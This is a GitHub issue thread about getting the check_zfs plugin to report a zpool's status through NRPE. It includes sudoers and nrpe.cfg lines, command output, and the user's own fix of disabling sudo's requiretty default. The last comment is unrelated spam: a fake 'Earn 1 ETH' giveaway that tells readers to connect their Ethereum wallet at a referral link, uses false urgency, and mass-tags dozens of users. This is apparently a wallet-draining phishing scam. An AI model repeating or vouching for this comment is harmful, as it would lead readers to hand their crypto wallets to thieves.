### ISSUE TITLE
NRPE trouble

### ISSUE THREAD

**Issue by mmulqueenJHU** [suchpool/check_zfs#1]
Good morning,

This is the first check_zfs port for linux that has worked for me. Thanks very much for the work. I'm having some trouble getting the plugin to report the status of my zpool via NRPE though. The plugin under /usr/lib64/nagios/plugins is world executable. I added the following line to /etc/nagios/nrpe.cfg

command[check_zfs]=/usr/lib64/nagios/plugins/check_zfs gray 3

I gave passwordless sudo privs to run zpool and zfs to users in the group zfs and added the users nagios and nrpe to the zfs group.

%zfs    ALL=(ALL) NOPASSWD: /usr/sbin/zpool, /usr/sbin/zfs

[root@io01 plugins]# groups nagios
nagios : nagios zfs
[root@io01 plugins]# groups nrpe
nrpe : nrpe zfs

I've verified that the script gives returns the correct status on my zpool when executed locally by nagios and nrpe.

[root@io01 plugins]# su - nagios
Last login: Wed Oct 14 09:17:11 EDT 2015 on pts/0
-bash-4.2$ /usr/lib64/nagios/plugins/check_zfs gray 3
OK ZPOOL gray : ONLINE {Size:87T Used:5.81T Avail:81.2T Cap:6%} raidz2-0:ONLINE disk0:ONLINE disk1:ONLINE disk2:ONLINE disk3:ONLINE disk4:ONLINE disk5:ONLINE raidz2-1:ONLINE disk6:ONLINE disk7:ONLINE disk8:ONLINE disk9:ONLINE disk10:ONLINE disk11:ONLINE raidz2-2:ONLINE disk12:ONLINE disk13:ONLINE disk14:ONLINE disk15:ONLINE disk16:ONLINE disk17:ONLINE raidz2-3:ONLINE disk18:ONLINE disk19:ONLINE disk20:ONLINE disk21:ONLINE disk22:ONLINE disk23:ONLINE : md0:ONLINE : md1:ONLINE 
-bash-4.2$ exit
logout
[root@io01 plugins]# su - nrpe
Last login: Wed Oct 14 09:13:45 EDT 2015 on pts/0
-bash-4.2$ /usr/lib64/nagios/plugins/check_zfs gray 3
OK ZPOOL gray : ONLINE {Size:87T Used:5.81T Avail:81.2T Cap:6%} raidz2-0:ONLINE disk0:ONLINE disk1:ONLINE disk2:ONLINE disk3:ONLINE disk4:ONLINE disk5:ONLINE raidz2-1:ONLINE disk6:ONLINE disk7:ONLINE disk8:ONLINE disk9:ONLINE disk10:ONLINE disk11:ONLINE raidz2-2:ONLINE disk12:ONLINE disk13:ONLINE disk14:ONLINE disk15:ONLINE disk16:ONLINE disk17:ONLINE raidz2-3:ONLINE disk18:ONLINE disk19:ONLINE disk20:ONLINE disk21:ONLINE disk22:ONLINE disk23:ONLINE : md0:ONLINE : md1:ONLINE 

But remote execution gives an error.

[root@nagios plugins]# ./check_nrpe -H io01 -c check_zfs
CRITICAL ZPOOL {gray} does not exist and/or is not responding!

I've also verified that other commands are successful when run via NRPE.

[root@nagios plugins]# ./check_nrpe -H io01 -c check_io01_local_disks
DISK OK - free space: /dev 64360 MB (100% inode=99%); / 8686 MB (84% inode=99%);| /dev=0MB;57924;61142;0;64360 /=1551MB;9213;9725;0;10237

Can you see anything that I'm doing wrong or do you have any suggestions?

**Comment by mmulqueenJHU** [comment]
I figured this one out. The default options in /etc/sudoers on redhat systems sets 'Defaults    requiretty' which was preventing me from running sudo through cron, nrpe, and ssh. I commented out that line and the NRPE checks started working.

**Comment by felixovelar** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
weboAp, @imgusev, @rapiz1, @LuciferWolf, @AVert, @dogmother79, @majordutch, @achooley, @wucanyuan, @sarog, @kydar, @zhangxinrun, @galaxy0x, @SErr0r, @liyuechun, @theahmadzadeh, @LF-DevJourney, @poctek, @rainmetersjtu, @cyans, @skygong, @LeoHChen, @klich3, @novaventure, @zeropool, @voltsifer, @vilo-ubiq, @llgoo, @theunravelghoul, @hanksuper, @Cu4rach4, @sorokinvld, @graycattus, @weixingsun, @stormeyes, @Lilith3, @mmarov, @naseem142, @demoso, @whoiskoala, @CalixtoXO, @luoyanjiang, @e-Lang79, @wenweih, @qq674684107, @wf58585858, @pgdaniel, @devsontech, @phantomcoco, @lockelee1015
